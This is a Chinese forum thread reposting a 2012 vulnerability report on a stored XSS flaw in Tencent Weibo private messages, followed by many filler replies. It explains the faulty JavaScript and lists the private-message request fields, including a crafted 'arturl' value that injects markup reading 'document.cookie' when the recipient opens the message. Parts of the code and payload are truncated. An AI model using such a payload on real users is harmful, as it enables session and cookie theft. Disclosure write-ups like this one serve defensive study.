天泽在线_深圳CS俱乐部_CS对战平台_Cs1.6_amxx_sma插件_CS论坛

标题: 腾讯微博私信存储型XSS跨站漏洞 [打印本页]

作者: admin    时间: 2012-12-3 05:47
标题: 腾讯微博私信存储型XSS跨站漏洞
漏洞标题:腾讯微博私信存储型XSS跨站漏洞

漏洞类型:xss跨站脚本攻击

危害等级:高


简要描述:

最近大家都流行连载了。那么我们也开场吧~最近心伤的胖子一直在连载,不知道发重复了没。


详细说明:

漏洞成因:

缺陷文件:

http://mat1.gtimg.com/www/mb/js/mi_121016.js

1.首先进入MI.TalkList.picEvent函数

MI.TalkList.picEvent=function(a){

....

其中a为页面中所有class为PicBox的div集合,即div.PicBox

2.循环每一个class为PicBox的div

for(varb=0,f=a.length;b

varg=a,

....

g为每个div

3.k=c(g,"img")[0],获取PicBox里的第一个img图片

4.h=k.parentNode,获取k的父级元素,是一个链接

5.j=c(g,".picTools"),获取PicBox这个div里的picToolsDIV

6.缺陷在下面这几句JS代码

if(!MI.user.fun.wideStyle)

MI.tmpl.picTool=['',_("向左转"),'|',_("向右转"),'',_("查看原图"),"


"].join("");


UI.before(UI.html(MI.tmpl.picTool.replace("$Url",h.href.replace(/\/460$/g,"")).replace("$hisUrl",l))[0],h);

MI.tmpl.picTool直接将$Url替换为h.href

而h在取href属性值时,会自动将"<>等转换回",<,>等符号。

----------------------------------

结合实际HTML结构,如下:

k对应用户发送的图片


h对应k外层的A标签

...

h.href中的"<,>等重新转义回了",<,>

最终导致UI.html(MI.tmpl.picTool.replace("$Url",h.href.replace(/\/460$/g,"")).replace("$hisUrl",l))[0],h)

在输出HTML时,导致XSS出现

--------------------------------

利用方法,发送私信时,

http://api.t.qq.com/inbox/pm_mgr.php

sourcereply

ptidgainover

roomid

content.................

fid

arturlhttp://t2.qpic.cn/mblogpic/4955e75656b3d175296c/460#">

(document.cookie);" style="display:none"><i a="

murl

targetgainover

funcsend

efjs

pmlangzh_CN


apiType8


apiHosthttp://api.t.qq.com


漏洞证明:

对方打开私信时会触发XSS。


作者: ioclx    时间: 2012-12-5 12:33
好帖,有才  
作者: wyy0517    时间: 2012-12-7 14:09
问渠哪得清如许,为有源头活水来。  
作者: nMAqNGdy    时间: 2012-12-11 09:54
这样的贴子,不顶说不过去啊  
作者: 营英戴    时间: 2014-10-6 02:24
感謝樓主  
作者: 马哥丿无敌    时间: 2014-12-4 09:54
人气还要再提高  
作者: 雪神护卫队    时间: 2014-12-27 06:45
ding   支持  
作者: 反恐①号    时间: 2015-1-27 09:41
正好你开咯这样的帖  
作者: ︶ㄣ調丶ξ    时间: 2015-3-1 07:32
dddddddddddddd  
作者: 小辉在线    时间: 2015-3-29 11:17
这个贴不错!!!!!  
作者: 傻妮是怎样    时间: 2015-5-2 07:07
怎么就没人拜我为偶像那?? ~  
作者: 米西米西    时间: 2015-6-8 10:45
慢慢来,呵呵  
作者: 乖乖女    时间: 2015-7-14 08:02
这个贴不错!!!!!看了之后就要回复贴子,呵呵  
作者: 是猪你不认识?    时间: 2015-8-18 00:57
原来这样也可以  
作者: 很想    时间: 2015-9-19 07:36
偶啥时才能熬出头啊.  
作者: 偶看    时间: 2015-10-22 00:52
帮你项项吧  
作者: 摇头哥    时间: 2015-11-29 08:08
青春就像卫生纸。看着挺多的,用着用着就不够了。  
作者: 老丽州    时间: 2016-1-13 10:21
楼上的话等于没说~~~  
作者: 搞不怕    时间: 2016-2-22 22:46
我在顶贴~!~  
作者: 非法入境    时间: 2016-4-15 00:19
活着,以死的姿态……  
作者: 枝东王德    时间: 2016-6-17 12:14
水至清则无鱼,人至贱则无敌!  
作者: 战地狮虎    时间: 2016-7-28 20:55
昨晚多几分钟的准备,今天少几小时的麻烦。  
作者: 太婵娟    时间: 2016-9-27 14:22
我假装认真地工作,老板假装认真地付薪水  
作者: 噩噩噩噩    时间: 2016-11-21 19:17
就为赚分嘛  
作者: 豆豆豆    时间: 2017-1-20 11:49
顶.支持,路过.....  




欢迎光临 天泽在线_深圳CS俱乐部_CS对战平台_Cs1.6_amxx_sma插件_CS论坛 (https://bbs.tianzept.com/) Powered by Discuz! X3.4